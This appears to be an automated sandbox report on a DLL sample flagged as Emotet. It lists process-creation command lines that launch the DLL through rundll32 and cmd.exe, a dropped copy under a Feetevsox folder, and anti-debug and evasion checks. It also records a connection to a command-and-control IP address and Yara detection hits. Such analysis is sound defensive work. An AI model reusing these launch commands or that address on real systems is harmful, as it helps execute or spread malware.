                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function (process 6): 6_2_042D441E, 6_2_042ECAA8, 6_2_042E43B3, 6_2_042DEC27, 6_2_042E5220, 6_2_042DD223, 6_2_042D9E22, 6_2_042EF83F, 6_2_042F1A3C, 6_2_042D8C09, 6_2_042D1A0A, 6_2_042D220A, 6_2_042D4C00, 6_2_042DE21C, 6_2_042DF41F, 6_2_042E1C10, 6_2_042E406E, 6_2_042D1C76, 6_2_042DA048, 6_2_042D3845, 6_2_042D2A46, 6_2_042D2043, 6_2_042EE441, 6_2_042D2654, 6_2_042D9A57, 6_2_042DDAAE, 6_2_042E44AA, 6_2_042ED6A7, 6_2_042E78A5, 6_2_042DFEA0, 6_2_042E98BD, 6_2_042E90BA, 6_2_042D5AB2, 6_2_042DCC8D, 6_2_042E4E8A, 6_2_042E748A, 6_2_042F0687, 6_2_042D7283, 6_2_042EAC9B, 6_2_042DAC95, 6_2_042D3C91, 6_2_042ED091, 6_2_042EAEEB, 6_2_042EECE3, 6_2_042EDEF4, 6_2_042D30F6, 6_2_042EA8F0, 6_2_042EBEC9, 6_2_042E0ADE, 6_2_042ECCD4, 6_2_042F08D1, 6_2_042E7ED1, 6_2_042F292B, 6_2_042D6B25, 6_2_042D5923, 6_2_042F0B34, 6_2_042D2309, 6_2_042D3502, 6_2_042D251C, 6_2_042EFD10, 6_2_042E056A, 6_2_042E1F6B, 6_2_042E577E, 6_2_042EF14D, 6_2_042D3345, 6_2_042F1343, 6_2_042D3F5C, 6_2_042DC158, 6_2_042E4BAA, 6_2_042E2FA2, 6_2_042E9DA1, 6_2_042EB1B5, 6_2_042DBFB6, 6_2_042E7BB2, 6_2_042D758F, 6_2_042E4D8D, 6_2_042D4F8E, 6_2_042D9384, 6_2_042ED99A, 6_2_042EB397, 6_2_042DFD91, 6_2_042F1193, 6_2_042D55E8, 6_2_042EBFE8, 6_2_042DC5FE, 6_2_042F03F1, 6_2_042D6FC4, 6_2_042F25C3, 6_2_042DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function (process 7): 7_2_04EEECE3, 7_2_04EEDEF4, 7_2_04ED30F6, 7_2_04EF08D1, 7_2_04EE7ED1, 7_2_04EE44AA, 7_2_04EE78A5, 7_2_04ED5AB2, 7_2_04EE748A, 7_2_04EDAC95, 7_2_04ED3845, 7_2_04ED2043, 7_2_04EDEC27, 7_2_04EE5220, 7_2_04EEF83F, 7_2_04ED220A, 7_2_04ED441E, 7_2_04ED55E8, 7_2_04EDC5FE, 7_2_04ED6FC4, 7_2_04EE4BAA, 7_2_04EE2FA2, 7_2_04EDBFB6, 7_2_04ED758F, 7_2_04ED9384, 7_2_04EF0B34, 7_2_04EEAEEB, 7_2_04EEA8F0, 7_2_04EEBEC9, 7_2_04EE0ADE, 7_2_04EECCD4, 7_2_04EDDAAE, 7_2_04EECAA8, 7_2_04EED6A7, 7_2_04EDFEA0, 7_2_04EE98BD, 7_2_04EE90BA, 7_2_04EDCC8D, 7_2_04EE4E8A, 7_2_04EF0687, 7_2_04ED7283, 7_2_04EEAC9B, 7_2_04ED3C91, 7_2_04EED091, 7_2_04EE406E, 7_2_04ED1C76, 7_2_04EDA048, 7_2_04ED2A46, 7_2_04EEE441, 7_2_04ED2654, 7_2_04ED9A57, 7_2_04EDD223, 7_2_04ED9E22, 7_2_04EF1A3C, 7_2_04ED8C09, 7_2_04ED1A0A, 7_2_04ED4C00, 7_2_04EDE21C, 7_2_04EDF41F, 7_2_04EE1C10, 7_2_04EEBFE8, 7_2_04EF03F1, 7_2_04EF25C3, 7_2_04EDA3DF, 7_2_04EE9DA1, 7_2_04EEB1B5, 7_2_04EE7BB2, 7_2_04EE43B3, 7_2_04EE4D8D, 7_2_04ED4F8E, 7_2_04EED99A, 7_2_04EEB397, 7_2_04EDFD91, 7_2_04EF1193, 7_2_04EE056A, 7_2_04EE1F6B, 7_2_04EE577E, 7_2_04EEF14D, 7_2_04ED3345, 7_2_04EF1343, 7_2_04ED3F5C, 7_2_04EDC158, 7_2_04EF292B, 7_2_04ED6B25, 7_2_04ED5923, 7_2_04ED2309, 7_2_04ED3502, 7_2_04ED251C, 7_2_04EEFD10
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function 1003F350 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: String function 1003EE82 appears 50 times
                      Source: spZRMihlrkFGqYq1f.dll; Metadefender: Detection: 42%
                      Source: spZRMihlrkFGqYq1f.dll; ReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dll; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@17/0@0/20
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A742 _memset,GetDiskFreeSpaceA,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1B54 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A0F4 __EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
                      Source: rundll32.exe, 00000004.00000002.710493956.0000000003151000.00000004.00000020.sdmpBinary or memory string: penSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPA
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_CURSOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_BITMAP
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_MENU
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_DIALOG
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_STRING
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F395 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003EF21 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: real checksum: 0xb4236 should be: 0xbc245
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gisJump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000BD3C IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10022F30 GetParent,GetParent,IsIconic,GetParent,
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe TID: 4244 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 2.2 %
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1003A2F3 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04EE1A80 FindFirstFileW,
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 0000000C.00000002.841567859.000001A76FC8A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.841663587.000001A76FCEC000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_030EDE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_042EDE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04EEDE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1004A43B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10039F21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 51.178.61.60 187
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10048EDF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10045F08 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

Stealing of Sensitive Information:

Yara detected Emotet
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
